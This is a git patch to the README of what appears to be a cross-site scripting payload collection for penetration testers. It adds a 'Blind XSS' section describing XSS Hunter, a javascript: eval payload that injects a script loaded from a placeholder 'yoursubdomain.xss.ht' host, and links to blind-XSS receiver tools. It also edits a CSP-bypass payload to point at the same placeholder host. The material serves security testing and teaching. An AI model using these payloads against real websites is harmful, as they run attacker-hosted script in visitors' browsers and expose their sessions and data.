From a0f8e846fa8d72d40fa25420d38751be0372c3c3 Mon Sep 17 00:00:00 2001 From: Swissky Date: Sun, 18 Nov 2018 15:37:01 +0100 Subject: [PATCH] Blind XSS - XSS Hunter, Sleepy Puppy etc --- XSS injection/README.md | 28 +++++++++++++++++++++++++++- 1 file changed, 27 insertions(+), 1 deletion(-) diff --git a/XSS injection/README.md b/XSS injection/README.md index c828acc..ad8fa78 100644 --- a/XSS injection/README.md +++ b/XSS injection/README.md @@ -7,6 +7,7 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall - [XSS in HTML/Applications](#xss-in-htmlapplications) - [XSS in wrappers javascript and data URI](#xss-in-wrappers-javascript-and-data-uri) - [XSS in files (XML/SVG/CSS/Flash/Markdown)](#xss-in-files) +- [Blind XSS](#blind-xss) - [Polyglot XSS](#polyglot-xss) - [Filter Bypass and Exotic payloads](#filter-bypass-and-exotic-payloads) - [CSP Bypass](#csp-bypass) @@ -299,6 +300,31 @@ div { ``` +## Blind XSS + +### XSS Hunter + +Available at [https://xsshunter.com/app](https://xsshunter.com/app) + +> XSS Hunter allows you to find all kinds of cross-site scripting vulnerabilities, including the often-missed blind XSS. The service works by hosting specialized XSS probes which, upon firing, scan the page and send information about the vulnerable page to the XSS Hunter service. + +```javascript +"> + +javascript:eval('var a=document.createElement(\'script\');a.src=\'https://yoursubdomain.xss.ht\';document.body.appendChild(a)') + + + + +``` + +### Other tools for Blind XSS + +- [sleepy-puppy - Netflix](https://github.com/Netflix-Skunkworks/sleepy-puppy) +- [bXSS - LewisArdern](https://github.com/LewisArdern/bXSS) +- [BlueLotus_XSSReceiver - FiresunCN](https://github.com/firesunCN/BlueLotus_XSSReceiver) +- [ezXSS - ssl](https://github.com/ssl/ezXSS) + ## Polyglot XSS Polyglot XSS - 0xsobky @@ -751,7 +777,7 @@ window.frames[0].document.head.appendChild(script); ### Bypass CSP by [Rhynorater](https://gist.github.com/Rhynorater/311cf3981fda8303d65c27316e69209f) ```js -d=document;f=d.createElement("iframe");f.src=d.querySelector('link[href*=".css"]').href;d.body.append(f);s=d.createElement("script");s.src="https://swk.xss.ht";setTimeout(function(){f.contentWindow.document.head.append(s);},1000) +d=document;f=d.createElement("iframe");f.src=d.querySelector('link[href*=".css"]').href;d.body.append(f);s=d.createElement("script");s.src="https://yoursubdomain.xss.ht";setTimeout(function(){f.contentWindow.document.head.append(s);},1000) ``` ### Bypass CSP by [@akita_zen](https://twitter.com/akita_zen)